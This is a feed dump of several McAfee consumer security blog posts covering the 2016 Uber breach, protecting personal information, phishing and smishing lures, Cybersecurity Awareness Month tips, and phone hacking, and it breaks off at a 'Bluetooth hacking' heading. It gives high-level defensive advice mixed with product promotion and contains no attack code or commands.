The post Digital Estate Planning – What to Do With Your Digital Assets appeared first on McAfee Blog.

]]>
57 Million Users Compromised in Uber Leak: Protect Your Digital Privacy and Identity https://www.mcafee.com/blogs/privacy-identity-protection/57-million-users-compromised-in-uber-leak-protect-your-digital-privacy-and-identity/ Tue, 11 Oct 2022 15:47:09 +0000 https://www.mcafee.com/blogs/?p=160195

“I’ll just Uber home.”  Who hails a taxi anymore? These days, city streets are full of double-parked sedans with their...

The post 57 Million Users Compromised in Uber Leak: Protect Your Digital Privacy and Identity appeared first on McAfee Blog.

]]>

“I’ll just Uber home.” 

Who hails a taxi anymore? These days, city streets are full of double-parked sedans with their hazards on, looking for their charges. Uber is synonymous with ridesharing and has made it so far into our culture that it’s not just a company name but a verb.  

Uber’s reputation has ebbed and flowed since its creation in 2009, and it’s taken another hit recently as more details are coming to light about a massive 2016 cybersecurity breach and the chief security officer’s attempts to cover it up.  

What Happened in the 2016 Uber Breach?

In 2016, a ransomware group trawled the internet and gathered Uber’s credentials that opened the door into the company’s server database. The cybercriminals then stole the information of customers and drivers alike and held it for a $100,000 Bitcoin ransom. Joe Sullivan, Uber’s chief security officer at the time, paid the ransom and the criminal group agreed to delete the information they uncovered. While it’s not uncommon for large corporations to give in to cybercriminals and dole out huge ransom payments, Sullivan is facing potential jail time because he didn’t report the incident to the Federal Trade Commission. He was recently found guilty of wire fraud and concealing a felony from authorities.  

Uber account holders had their personally identifiable information in nefarious hands without their knowledge. The cybercriminals allegedly downloaded the names, email addresses and phone numbers of 57 million Uber customers and drivers, plus the license plate numbers of 600,000 drivers.1  

Why It’s Important for Companies to Report Leaks

Organizations have a responsibility to their customers to report any cyberbreaches. With a full name, email address, and phone number, cybercriminals can inflict a lot of damage on an innocent person’s credit, steal money from online accounts, or invade someone’s digital privacy. Customers must act swiftly to put the proper safeguards in place, but they can’t do that if they don’t even know a breach has happened! The longer a cybercriminal has to poke and prod someone’s digital footprint, the more havoc they can wreak and profits they can gain. 

How to Protect Your Personal Information Before and After a Breach 

Acting swiftly is key to keeping your personally identifiable information (PII) private after a breach, though there are a few measures you can take right now that could prevent your information from being compromised. Here’s what you can do before and after a breach. 

Preventive measures

One way to shrink your attack surface – or the number of possible entry points into your digital life – is to regularly vet your online accounts and apps. For example, when you’re cleaning your closet, it’s common to donate or trash any clothing you haven’t worn in a year. The same method works for your digital life. If you haven’t logged into a shopping site or mobile gaming app in over a year, it’s unlikely that you will use them anytime soon, so it’s time to say goodbye and delete it. 

McAfee credit lock and security freeze are other preventive measures that can keep your credit safe in case your PII is ever compromised. These services make it easy to prevent one or all three major credit bureaus from accessing your credit. In turn, this prevents anyone other than you from opening a bank account, applying for a loan, or making a substantial purchase. If you’re not planning on needing a credit report, it’s a great practice to freeze your credit. 

Reactive measures

When you first hear of a company’s data leak with which you have an account, the first step you should take is to change your account password. Login and password combinations are often compromised in a data breach. Make sure your new password is strong and is not a duplicate of a password you use elsewhere. 

Next, consider running a Personal Data Cleanup scan. Personal Data Cleanup checks risky data broker sites and alerts you if your information appears on any of them. From there, you can take steps to remove your information. 

Finally, for the next few weeks, keep close tabs on your financial, online, and email accounts. Watch for suspicious activities like purchases you didn’t make, electronic receipts, notifications, or mailing lists that you didn’t sign up for. McAfee+ Ultimate can help you here with its identity monitoring and full-service Personal Data Cleanup. McAfee+ gives you a partner to alert you and help you recover if your digital privacy is compromised. 

Constant Vigilance and Digital Confidence-Boosting Assets

Protecting your identity and digital privacy is a two-way street. While identity and privacy protection tools go a long way, individuals also have a responsibility to remain vigilant and take quick action if they suspect their information is compromised. And the ultimate responsibility lies with companies to alert the authorities and their customers after a data leak and to take serious steps to shore up their security to make sure it never happens again. 

1The Verge, “Former Uber security chief found guilty of covering up massive 2016 data breach 

The post 57 Million Users Compromised in Uber Leak: Protect Your Digital Privacy and Identity appeared first on McAfee Blog.

]]>
Take It Personally: Ten Tips for Protecting Your Personally Identifiable Information (PII) https://www.mcafee.com/blogs/privacy-identity-protection/take-it-personally-ten-tips-for-protecting-your-personally-identifiable-information-pii/ Tue, 11 Oct 2022 15:30:43 +0000 /blogs/?p=116260

Seems like the internet follows us wherever we go nowadays, whether it tags along via a smartphone, laptop, tablet, a...

The post Take It Personally: Ten Tips for Protecting Your Personally Identifiable Information (PII) appeared first on McAfee Blog.

]]>

Seems like the internet follows us wherever we go nowadays, whether it tags along via a smartphone, laptop, tablet, a wearable, or some combination of them all. Yet there’s something else that follows us around as well—our PII, a growing body of “personally identifiable information” that we create while banking, shopping, and simply browsing the internet. And no doubt about it, our PII is terrifically valuable. 

What makes it so valuable? It’s no exaggeration to say that your PII is the key to your digital life, along with your financial and civic life as well. Aside from using it to create accounts and logins, it’s further tied to everything from your bank accounts and credit cards to your driver’s license and your tax refund.  

Needless to say, your PII is something that needs protecting, so let’s take a look at several ways you can do just that. 

What is PII? 

What is PII? It’s information about you that others can use to identify you either directly or indirectly. Thus, that info could identify you on its own, or it could identify you when it’s linked to other identifiers, like the ones associated with the devices, apps, tools, and protocols you use.  

A prime example of direct PII is your tax ID number because it’s unique and directly associated with your name. Further instances include your facial image to unlock your smartphone, your medical records, your finances, and your phone number because each of these can be easily linked back to you. 

Then there are those indirect pieces of PII that act as helpers. While they may not identify you on their own, a few of them can when they’re added together. These helpers include things like internet protocol addresses, the unique device ID of your smartphone, or other identifiers such as radio frequency identification tags. 

You can also find pieces of your PII in the accounts you use, like your Google to Apple IDs, which can be linked to your name, your email address, and the apps you have. You’ll also find it in the apps you use. For example, there’s PII in the app you use to map your walks and runs, because the combination of your smartphone’s unique device ID and GPS tracking can be used in conjunction with other information to identify who you are, not to mention where you typically like to do your 5k hill days. The same goes for messenger apps, which can collect how you interact with others, how often you use the app and your location information based on your IP address, GPS information, or both. 

In all, there’s a cloud of PII that follows us around as we go about our day online. Some wisps of that cloud are more personally identifying than others. Yet gather enough of it and PII can create a high-resolution snapshot of you—who you are, what you’re doing when you’re doing it, and even where you’re doing it too—particularly if it gets into the wrong hands. 

Remember Pig-Pen, the character straight from the old funny pages of Charles Schultz’s Charlie Brown? He’s hard to forget with that ever-present cloud of dust following him around. Charlie Brown once said, “He may be carrying the soil that trod upon by Solomon or Nebuchadnezzar or Genghis Khan!” It’s the same with us and our PII, except the cloud surrounding us, isn’t the dust of kings and conquerors, they’re motes of digital information that are of tremendously high value to crooks and bad actors—whether for purposes of identity theft or invasion of privacy. 

Protecting your PII protects your identity and privacy 

With all PII we create and share on the internet, that calls for protecting it. Otherwise, our PII could fall into the hands of a hacker or identity thief and end up getting abused, in potentially painful and costly ways. 

Here are several things you can do to help ensure that what’s private stays that way: 

1) Use a complete security platform that can also protect your privacy 

Square One is to protect your devices with comprehensive online protection software. This will defend you against the latest virus, malware, spyware, and ransomware attacks plus further protect your privacy and identity. In addition to this, it can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who may try to force their way into your accounts. 

Further, security software can also include a firewall that blocks unwanted traffic from entering your home network, such as an attacker poking around for network vulnerabilities so that they can “break-in” to your computer and steal information.  

2) Use a VPN 

Also known as a virtual private network, a VPN helps protect your vital PII and other data with bank-grade encryption. The VPN encrypts your internet connection to keep your online activity private on any network, even public networks. Using a public network without a VPN can increase your cybersecurity risk because others on the network can potentially spy on your browsing and activity. 

If you’re new to the notion of using a VPN, check out this article on VPNs and how to choose one so that you can get the best protection and privacy possible. 

3) Keep a close grip on your Social Security Number 

In the U.S., the Social Security Number (SSN) is one of the most prized pieces of PII as it unlocks the door to employment, finances, and much more. First up, keep a close grip on it. Literally. Store your card in a secure location. Not your purse or wallet. 

Certain businesses and medical practices may ask you for your SSN for billing purposes and the like. You don’t have to provide it (although some businesses could refuse service if you don’t), and you can always ask if they will accept some alternative form of information. However, there are a handful of instances where an SSN is a requirement. These include: 

  • Employment or contracting with a business. 
  • Group health insurance. 
  • Financial and real estate transactions. 
  • Applying for credit cards, car loans, and so forth. 

Be aware that hackers often get a hold of SSNs because the organization holding that information gets hacked or compromised itself. Minimizing how often you provide your SSN can offer an extra degree of protection.   

4) Protect your files 

Protecting your files with encryption is a core concept in data and information security, and thus it’s a powerful way to protect your PII. It involves transforming data or information into code that requires a digital key to access it in its original, unencrypted format. For example, McAfee Total Protection includes File Lock, which is our file encryption feature that lets you lock important files in secure digital vaults on your device. 

Additionally, you can also delete sensitive files with an application such as McAfee Shredder™, which securely deletes files so that thieves can’t access them. (Quick fact: deleting files in your trash doesn’t actually delete them in the truest sense. They’re still there until they’re “shredded” or otherwise overwritten such that they can’t be restored.) 

5) Steer clear of those internet “quizzes” 

Which Marvel Universe superhero are you? Does it really matter? After all, such quizzes and social media posts are often grifting pieces of your PII in a seemingly playful way. While you’re not giving up your SSN, you may be giving up things like your birthday, your pet’s name, your first car … things that people often use to compose their passwords or use as answers to common security questions on banking and financial sites. The one way to pass this kind of quiz is not to take it! 

6) Be on the lookout for phishing attacks 

A far more direct form of separating you from your PII are phishing attacks. Posing as emails from known or trusted brands, financial institutions, or even a friend or family member a cybercrook’s phishing attack will attempt to trick you into sharing important information like your logins, account numbers, credit card numbers, and so on under the guise of providing customer service. 

How do you spot such emails? Well, it’s getting a little tougher nowadays because scammers are getting more sophisticated and can make their phishing emails look nearly legitimate. However, there are several ways you can spot a phishing email and phony web pages as outlined here. 

Comprehensive security offers another layer of prevention, in this case by offering browser protection like our own Web Advisor, which will alert you in the event you come across suspicious links and downloads that can steal your PII or otherwise expose you to attacks. 

7) Keep mum in your social media profile 

With social engineering attacks that deceive victims by posing as people the victim knows and the way we can sometimes overshare a little too much about our lives, you can see why a social media profile is a potential goldmine for cybercriminals. 

Two things you can do to help protect your PII from being at risk via social media: one, think twice about what PII you might be sharing in that post or photo—like the location of your child’s school or the license plate on your car; two, set your profile to private so that only friends can see it. Review your privacy settings regularly to keep your profile information out of the public eye. And remember, nothing is 100% private on the internet. Never post anything you wouldn’t want to see shared. 

8) Look for HTTPS when you browse 

The “S” stands for secure. Any time you are shopping, banking, or sharing any kind of PII, look for “https” at the start of the web address. Some browsers will also indicate HTTP by showing a small “lock” icon. Doing otherwise on plain HTTP sites exposes your PII for anyone who cares to monitor that site for unsecured connections. 

9) Lock your devices 

By locking your devices, you protect yourself that much better from PII and data theft in the event your device is lost, stolen, or even left unattended for a short stretch. Use your password, PIN, facial recognition, thumbprint ID, what have you. Just lock your stuff. In the case of your smartphones, read up on how you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well.  

10) Keep tabs on your credit—and your PII 

Theft of your PII can of course lead to credit cards and other accounts being opened falsely in your name. What’s more, it can sometimes be some time before you even become aware of it, until perhaps your credit score takes a hit or a bill collector comes calling. By checking your credit, you can address any issues that come up, as companies typically have a clear-cut process for contesting any fraud. You can get a free credit report in the U.S. via the Federal Trade Commission (FTC) and likewise, other nations like the UK have similar free offerings as well. 

Consider identity theft protection as well. A strong identity theft protection package pairs well with keeping track of your credit and offers cyber monitoring that scans the dark web to detect for misuse of your PII. With our identity protection service, we help relieve the burden of identity theft if the unfortunate happens to you with $1M coverage for lawyer fees, travel expenses, lost wages, and more.  

The post Take It Personally: Ten Tips for Protecting Your Personally Identifiable Information (PII) appeared first on McAfee Blog.

]]>
The Seven Main Phishing Lures of Cybercriminals https://www.mcafee.com/blogs/mobile-security/the-seven-main-phishing-lures-of-cybercriminals/ Mon, 10 Oct 2022 13:16:05 +0000 https://securingtomorrow.mcafee.com/?p=96823

One of the oldest tricks in the cybercrime playbook is phishing. It first hit the digital scene in 1995, at...

The post The Seven Main Phishing Lures of Cybercriminals appeared first on McAfee Blog.

]]>

One of the oldest tricks in the cybercrime playbook is phishing. It first hit the digital scene in 1995, at a time when millions flocked to America Online (AOL) every day. And if we know one thing about cybercriminals, it’s that they tend to follow the masses. In earlier iterations, phishing attempts were easy to spot due to link misspellings, odd link redirects, and other giveaways. However, today’s phishing tricks have become personalized, advanced, and shrouded in new disguises. So, let’s take a look at some of the different types, real-world examples and how you can recognize a phishing lure.

Be Wary of Suspicious Emails

Every day, users get sent thousands of emails. Some are important, but most are just plain junk. These emails often get filtered to a spam folder, where phishing emails are often trapped. But sometimes they slip through the digital cracks, into a main inbox. These messages typically have urgent requests that require the user to input sensitive information or fill out a form through an external link. These phishing emails can take on many personas, such as banking institutions, popular services, and universities. As such, always remember to stay vigilant and double-check the source before giving away any information.

Link Look-A-Likes

A sort of sibling to email phishing, link manipulation is when a cybercriminal sends users a link to malicious website under the ruse of an urgent request or deadline. After clicking on the deceptive link, the user is brought to the cybercriminal’s fake website rather than a real or verified link and asked to input or verify personal details. This exact scenario happened last year when several universities and businesses fell for a campaign disguised as a package delivery issue from FedEx. This scheme is a reminder that anyone can fall for a cybercriminals trap, which is why users always have to careful when clicking, as well as ensure the validity of the claim and source of the link. To check the validity, it’s always a good idea to contact the source directly to see if the notice or request is legitimate.

Gone Whaling

Corporate executives have always been high-level targets for cybercriminals. That’s why C-suite members have a special name for when cybercriminals try to phish them – whaling. What sounds like a silly name is anything but. In this sophisticated, as well as personalized attack, a cybercriminal attempts to manipulate the target to obtain money, trade secrets, or employee information. In recent years, organizations have become smarter and in turn, whaling has slowed down. Before the slowdown, however, many companies were hit with data breaches due to cybercriminals impersonating C-suite members and asking lower-level employees for company information. To avoid this pesky phishing attempt, train C-suite members to be able to identify phishing, as well as encourage unique, strong passwords on all devices and accounts.

Spear Target Acquired

 Just as email spam and link manipulation are phishing siblings, so too are whaling and spear-phishing. While whaling attacks target the C-suite of a specific organization, spear-phishing rather targets lower-level employees of a specific organization. Just as selective and sophisticated as whaling, spear-phishing targets members of a specific organization to gain access to critical information, like staff credentials, intellectual property, customer data, and more. Spear-phishing attacks tend to be more lucrative than a run-of-the-mill phishing attack, which is why cybercriminals will often spend more time crafting and obtaining personal information from these specific targets. To avoid falling for this phishing scheme, employees must have proper security training so they know how to spot a phishing lure when they see one.

Spoofed Content

With so many things to click on a website, it’s easy to see why cybercriminals would take advantage of that fact. Content spoofing is based on exactly that notion – a cybercriminal alters a section of content on a page of a reliable website to redirect an unsuspecting user to an illegitimate website where they are then asked to enter personal details. The best way to steer clear of this phishing scheme is to check that the URL matches the primary domain name.

Phishing in a Search Engine Pond

 When users search for something online, they expect reliable resources. But sometimes, phishing sites can sneak their way into legitimate results. This tactic is called search engine phishing and involves search engines being manipulated into showing malicious results. Users are attracted to these sites by discount offers for products or services. However, when the user goes to buy said product or service, their personal details are collected by the deceptive site. To stay secure, watch out for potentially sketchy ads in particular and when in doubt always navigate to the official site first.

Who’s That Caller?

With new technologies come new avenues for cybercriminals to try and obtain personal data. Vishing, or voice phishing, is one of those new avenues. In a vishing attempt, cybercriminals contact users by phone and ask the user to dial a number to receive identifiable bank account or personal information through the phone by using a fake caller ID. For example, just last year, a security researcher received a call from their financial institution saying that their card had been compromised. Instead of offering a replacement card, the bank suggested simply blocking any future geographic-specific transactions. Sensing something was up, the researcher hung up and dialed his bank – they had no record of the call or the fraudulent card transactions. This scenario, as sophisticated as it sounds, reminds users to always double-check directly with businesses before sharing any personal information.

As you can see, phishing comes in all shapes and sizes. This blog only scratches the surface of all the ways cybercriminals lure unsuspecting users into phishing traps. The best way to stay protected is to invest in comprehensive security and stay updated on new phishing scams.

The post The Seven Main Phishing Lures of Cybercriminals appeared first on McAfee Blog.

]]>
What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe https://www.mcafee.com/blogs/mobile-security/what-is-smishing-heres-how-to-spot-fake-texts-and-keep-your-info-safe/ Fri, 07 Oct 2022 13:18:15 +0000 https://www.mcafee.com/blogs/?p=159654

Your phone buzzes. You hope it’s a reply from last night’s date, but instead you get an entirely different swooping...

The post What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe appeared first on McAfee Blog.

]]>

Your phone buzzes. You hope it’s a reply from last night’s date, but instead you get an entirely different swooping feeling: It’s an alarming SMS text alerting you about suspicious activity on your bank account and that immediate action is necessary.  

Take a deep breath and make sure to read the message carefully. Luckily, your assets could be completely safe. It could just be a smisher. 

Smishing, or phishing over SMS, is a tactic where cybercriminals impersonate reputable organizations or people and trick people into handing over their PII or financial details. Sometimes they can seem very credible with the information they have, and you may have even been expecting a correspondence of a similar nature. 

So how can you tell when an SMS text is real and requires your attention? And how should you deal with a smisher to keep your identity safe? 

What Is Smishing? 

Like email phishing and social media phishing,

SMS text phishing often tries to use a strong emotion – like fear, anger, guilt, or excitement – to get you to respond immediately and without thinking through the request completely.  

In the case of one coordinated smishing attack, cybercriminals not only impersonated financial institutions but collected PII on their targets ahead of time. The criminals then used these personal details – like old addresses and Social Security Numbers – to convince people that they were legitimate bank employees.1 But since when does a bank try to prove itself to the customer? Usually, it’s the other way around, where they’ll ask you to confirm your identity. Be wary of anyone who texts or calls you and has your PII. If you’re ever suspicious of a caller or texter claiming they’re a financial official, contact your bank through verified channels (chat, email, or phone) you find on the bank’s website to make sure. 

Smishers often keep up with current events and attempt to impersonate well-known companies that have a reason to reach out to their customers. This adds false legitimacy to their message. For example, in the summer of 2022, Rogers Communications, a Canadian telecommunications provider, experienced an extended loss of service and told customers they could expect a reimbursement. Smishers jumped on the opportunity and sent a barrage of fake texts requesting banking details in order to carry out the reimbursement.2 However, Rogers credited customers directly to their Rogers accounts.  

3 Tips to Identify a Smisher 

If you receive a suspicious text, go through these three steps to determine if you should follow up with the organization in question or simply delete and report the text. 

1. Know your notification preferences.

Do you have text alerts enabled for your bank and utility accounts? If not, disregard any text claiming to be from those organizations. Companies will only contact you through the channels you have approved. Also, in the case of the Rogers smishing scheme, be aware of how a company plans to follow up with customers regarding reimbursements. You can find information like this on their official website and verified social channels. 

2. Check the tone.

If the tone of the text urges you to act quickly or proposes a dire consequence of ignoring the message, be on alert. While suspicious activity on your credit card is serious, your bank will likely reimburse you for charges you didn’t make, so you have time to check your bank account and see recent activities. Official correspondence from financial institutions will always be professional, typo-free, and will try to put you at ease, not make you panic.

3. Verify the phone number.

Whenever you get a text from someone you don’t know, it’s a good practice to do an internet search for the number to see with whom it’s associated. If it’s a legitimate number, it should appear on the first page of the search results and direct to an official bank webpage. 

What to Do When You Receive a Fake SMS Alert 

Once you’ve identified a fake SMS alert, do not engage with it. Never click on any links in the message, as they can redirect you to risky sites or download malware to your device. If you have McAfee Safe Browsing on your mobile, it can be your backup if you accidentally open a malicious link. 

Also, don’t reply to the text. A reply lets the criminal on the other end know that they reached a valid phone number, which may cause them to redouble their efforts. Finally, block the number and report it as spam. 

A great absolute rule to always follow is to never give out your Social Security Number, banking information, usernames, or passwords over text. 

How to Keep Your PII Safe from Smishers 

To give you peace of mind in cases where you think a malicious actor has access to your PII, you can count on McAfee+. McAfee+ offers a comprehensive suite of identity and privacy protection services to help you feel more confident in your digital life. 

1PC Mag, “Scammers Are Using Fake SMS Bank Fraud Alerts to Phish Victims, FBI Says 

2Daily Hive, “Rogers scam alert: Texts offering credit after outage are fake 

The post What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe appeared first on McAfee Blog.

]]>
See Yourself in Cyber – Five Quick Ways You Can Quickly Get Safer Online https://www.mcafee.com/blogs/internet-security/see-yourself-in-cyber-five-quick-ways-you-can-quickly-get-safer-online/ Mon, 03 Oct 2022 09:07:56 +0000 https://www.mcafee.com/blogs/?p=159324

With “See Yourself in Cyber” as the theme for this year’s Cybersecurity Awareness Month, the focus is on you with...

The post See Yourself in Cyber – Five Quick Ways You Can Quickly Get Safer Online appeared first on McAfee Blog.

]]>

With “See Yourself in Cyber” as the theme for this year’s Cybersecurity Awareness Month, the focus is on you with a look at several quick ways you can quickly get safer online. 

Now in its 21st year, Cybersecurity Awareness Month marks a long-standing collaboration between the U.S. government and private industry. It’s aim, empower people to protect themselves from digital forms of crime. And that stands as a good reminder. Phishing attacks, malware, and the other threats we regularly talk about in our blog are indeed forms of crime. And where there’s crime, there’s a person behind it. 

It can be easy to lose sight of that, particularly as the crook on the other end of the attack is hiding behind a computer. Cybercrime can feel anonymous that way, yet it’s anything but. Whether a single bad actor or as part of a large crime organization, people power cybercrime. 

Yet just as you secure your home to prevent yourself from becoming a victim of a criminal, you can also secure your digital life to prevent yourself from becoming a victim of cybercriminal. 

Shore up your security, easily. 

You have plenty of places where you can start, and they’re all good ones. Even a handful of the simplest measures can significantly decrease your risk. Better yet, several take far less time to put into place than you might think, while yet more work automatically once you implement them—making them a sort of “set it and forget it” security measure. 

With that, this five-step list can get you going: 

1) Use strong passwords and a password manager to stay on top of them all 

Strong, unique passwords offer another primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one, and McAfee also offers a free service with True Key. 

2) Set your apps and operating system to update automatically 

Updates do all kinds of great things for gaming, streaming, and chatting apps, like add more features and functionality over time. Updates do something else—they make those apps more secure. Hackers will hammer away at apps to find or create vulnerabilities, which can steal personal info or compromise the device itself. Updates will often include security improvements, in addition to performance improvements.  

For your computers and laptops: 

For your smartphones: 

For your smartphone apps: 

3) Take care of your browser too! 

Often overlooked is the humble browser. Yet if you think about it, the browser is one of the apps we use most often. Particularly on our desktops. It takes us shopping, to shows, the bank, and even work. Hackers realize that, which is why they love targeting browsers. Whether it’s through vulnerabilities in the code that runs the browser, injecting malicious code into a browser session, or any one of several other attack vectors, hackers will try to find a way to compromise computers via the browser. 

One of the best ways to keep your browser safe is to keep it updated. By updating your browser, you’ll get the latest in features and functionality in addition to security fixes that can prevent attacks from hackers. It’s a straightforward process, and this article will show you can set your browser to automatically update. 

4) Know how you can spot a phishing attack 

Whether they come by way of an email, text, direct message, or as bogus ads on social media and in search, phishing attacks remain popular with cybercriminals. Across their various forms, the intent remains the same—to steal personal or account information by posing as a well-known company, organization, or even someone the victim knows. And depending on the information that gets stolen, it can result in a drained bank account, a hijacked social media profile, or any number of different identity crimes. What makes some phishing attacks so effective is how some hackers can make the phishing emails and sites they use look like the real thing, so learning how to spot phishing attacks has become a valuable skill nowadays. Additionally, comprehensive online protection software will include web protection that can spot bogus links and sites and warn you away from them, even if they look legit. 

Some signs of a phishing attack include: 

Email addresses that slightly alter the address of a trusted brand name so it looks close at first glance. 

  • Awkward introductions like a “Dear Sir or Madam,” from your bank. 
  • Bad spelling and grammar, which indicate the communication is not coming from a professional organization. 
  • Poor visual design, like stretched logos, mismatched colors, and cheap stock photos. 
  • Urgent calls to action or threats that pressure you to claim a reward or pay a fine immediately followed by a link to do so. 
  • Unexpected attachments, such as a “shipping invoice” or “bills,” which hackers use to hide payloads of malware and ransomware. 

Again, this can take a sharp eye to spot. When you get emails like these, take a moment to scrutinize them and certainly don’t click on any links. 

Another way you can fight back against crooks who phish is to report them. Check out ReportFraud.ftc.gov, which shares reports of phishing and other fraud with law enforcement. Taken together with other reports, your information can aid an investigation and help bring charges on a cybercriminal or an organized ring.  

5) Multifactor your defense  

Chances are you’re using multi-factor authentication (MFA) on a few of your accounts already, like with your bank or financial institutions. MFA provides an additional layer of protection that makes it much more difficult for a hacker or bad actor to compromise your accounts even if they know your password and username. It’s quite common nowadays, where an online account will ask you to use an email or a text to your smartphone to as part of your logon process. If you have MFA as an option when logging into your accounts, strongly consider using it. 

Keep going! 

This list can get you started, and you can take even more steps now that you’re rolling. Keep dropping by our blog for more ways you can make yourself safer, such as on social media, your smartphone, in app stores, and more. Visit us any time! 

The post See Yourself in Cyber – Five Quick Ways You Can Quickly Get Safer Online appeared first on McAfee Blog.

]]>
4 Easy Things You Can Do Today to Improve Your Cybersecurity https://www.mcafee.com/blogs/privacy-identity-protection/4-easy-things-you-can-do-today-to-improve-your-cybersecurity/ Sat, 01 Oct 2022 08:06:31 +0000 https://www.mcafee.com/blogs/?p=159587

Happy Cybersecurity Awareness Month!   Every October, the National Cybersecurity Alliance selects a theme around which to publish extensive awareness...

The post 4 Easy Things You Can Do Today to Improve Your Cybersecurity appeared first on McAfee Blog.

]]>

Happy Cybersecurity Awareness Month!  

Every October, the National Cybersecurity Alliance selects a theme around which to publish extensive awareness resources and practical tips to help you improve your cybersecurity.1 This year’s theme is “It’s easy to stay safe online.” With the number of cyberthreats and breaches dominating the headlines, it can seem like a Herculean task to cover all your bases; however, with just four easy habits, you can actually protect yourself against a large percentage of these threats!  

Don’t be scared of hackers, phishers, or cybercriminals this month. Leave that to the ghosts, ghouls, and your upcoming holiday social calendar. 

1. Multifactor Authentication

Multifactor authentication (MFA) is an excellent way to frustrate cybercriminals attempting to break into your online accounts. MFA means that you need more than a username and password to log in, such as a one-time code sent to by email, text, or through an authentication app or a face or fingerprint scan. This adds an extra layer of security, because a thief would have to have access to your device, your email, or be able to trick a biometric reader to get into your online account.  

Most online sites offer the option to turn on MFA. While it may add an extra few seconds to the login process, it’s well worth it. Username and password combinations can be up for sale on the dark web following a breach. With these in hand, a cybercriminal could then help themselves to your online bank account, online medical records, and possibly your identity. When an account is secured with MFA, a criminal may quickly move on to another target that’s easier to crack. 

2. Using Strong Passwords and Password Managers

Most sites won’t even let you proceed with creating an account if you don’t have a strong enough password. A strong password is one with a mix of capital and lowercase letters, numbers, and special characters. What also makes for an excellent password is one that’s unique. Reusing passwords can be just as risky as using “password123” or your pet’s name plus your birthday as a password. A reused password can put all your online accounts at risk, due to a practice called credential stuffing. Credential stuffing is a tactic where a cybercriminal attempts to input a stolen username and password combination in dozens of random websites and to see which doors it opens. 

Remembering a different password for each of your online accounts is almost an impossible task. Luckily, password managers make it so you only have to remember one password ever again! Password managers, like the one available in McAfee+. safeguard all your passwords in one secure desktop extension or cellphone app that you can use anywhere. McAfee+ is secured with one of the most secure encryption algorithms available, and multifactor authentication is always standard. 

It’s best to create passwords or passphrases that have a secret meaning that only you know. Stay away from using significant dates, names, or places, because those are easier to guess. You can also leave it up to your password manager to randomly generate a password for you. The resulting unintelligible jumble of numbers, letters, and symbols is virtually impossible for anyone to guess. 

3. Updating Software

Software update notifications always seem ping on the outskirts of your desktop and mobile device at the most inconvenient times. What’s more inconvenient though is having your device hacked. Another easy tip to improve your cybersecurity is to update your device software whenever upgrades are available. Most software updates include security patches that smart teams have created to foil cybercriminals. The more outdated your apps or operating system is, the more time criminals have had to work out ways to infiltrate them. 

Consider enabling automatic updates on all your devices. Many major updates occur in the early hours of the morning, meaning that you’ll never know your devices were offline. You’ll just wake up to new, secure software! 

4. Recognizing and Reporting Phishing

You’ve likely already experienced a phishing attempt, whether you were aware of it or not. Phishing is a common tactic used to eke personal details from unsuspecting or trusting people. Phishers often initiate contact through texts, emails, or social media direct messages, and they aim to get enough information to hack into your online accounts or to impersonate you.  

Luckily, it’s usually easy to identify a phisher. Here are a few tell-tale signs for be on the lookout for: 

  • Poor spelling or grammar 
  • Links to suspicious-looking URLs 
  • A tone of urgency, fear, anger, or pleas for sympathy 
  • Requests for banking or personal details, passwords, or money wires 

Never engage with a phishing attempt. Do not forward the message or respond to them and never click on any links included in their message. The links could direct to malicious sites that could infect your device with malware or spyware.  

Before you delete the message, block the sender, mark the message as junk, and report the phisher. Reporting can go a long way toward hopefully preventing the phisher from targeting someone else. 

Great Habits With a Side of Cybersecurity Tools 

The best complement to your newfound excellent cyberhabits is a toolbelt of excellent services to patch any holes in your defense. McAfee+ includes all the services you need to boost your peace of mind about your online identity and privacy. You can surf public Wi-Fis safely with its secure VPN, protect your device with antivirus software, scan risky sites for your personally identifiable information, and more! 

This October, make a commitment to improving your cybersecurity with the guidance of the National Cybersecurity Alliance and McAfee. 

1National Cybersecurity Alliance, “Cybersecurity Awareness Month 

The post 4 Easy Things You Can Do Today to Improve Your Cybersecurity appeared first on McAfee Blog.

]]>
How Do Hackers Hack Phones and How Can I Prevent It? https://www.mcafee.com/blogs/family-safety/how-do-hackers-hack-phones-and-how-can-i-prevent-it/ Thu, 29 Sep 2022 14:00:54 +0000 /blogs/?p=99360

The threat of having your phone hacked has become a common fear. The truth is that it is possible to hack any phone. With the advancement of technology, where discovery of knowledge and information advances the understanding of technology, hackers are able to hack even the most sophisticated phone software. But how?

The post How Do Hackers Hack Phones and How Can I Prevent It? appeared first on McAfee Blog.

]]>

How do hackers hack phones? Several ways. Just as there are several ways you can prevent it from happening to you. 

The thing is that our phones are like little treasure chests. They’re loaded with plenty of personal data, and we use them to shop, bank, and take care of other personal and financial matters—all of which are of high value to identity thieves.  

However, you can protect yourself and your phone by knowing what to look out for and by taking a few simple steps. Let’s break it down by first taking a look at some of the more common attacks.  

Types of Smartphone Hacks and Attacks 

Hacking software 

Whether hackers sneak it onto your phone by physically accessing your phone or by tricking you into installing it via a phony app, a sketchy website, or a phishing attack, hacking software can create problems for you in a couple of ways: 

  • Keylogging: In the hands of a hacker, keylogging works like a stalker by snooping information as you type, tap, and even talk on your phone.  
  • Trojans: Trojans are types of malware that can be disguised in your phone to extract important data, such as credit card account details or personal information. 

Some possible signs of hacking software on your phone include: 

  • A battery that drains way too quickly. 
  • Your phone runs a little sluggish or gets hot. 
  • Apps quit suddenly or your phone shuts off and turns back on. 
  • You see unrecognized data, text, or other charges on your bill.   

In all, hacking software can eat up system resources, create conflicts with other apps, and use your data or internet connection to pass along your personal information into the hands of hackers—all of which can lead to some of the symptoms listed above. 

Phishing attacks 

These are a classic form of attack. In fact, hackers have leveled them at our computers for years now too. Phishing is where hackers impersonate a company or trusted individual to get access to your accounts or personal info or both. And these attacks take many forms, like emails, texts, instant messages, and so forth, some of which can look really legitimate. Common to them are links to bogus sites that attempt to trick you into handing over that info or that install malware to wreak havoc on your device or likewise steal information. Learning how to spot a phishing attack is one way to keep yourself from falling victim to one. 

Bluetooth hacking 

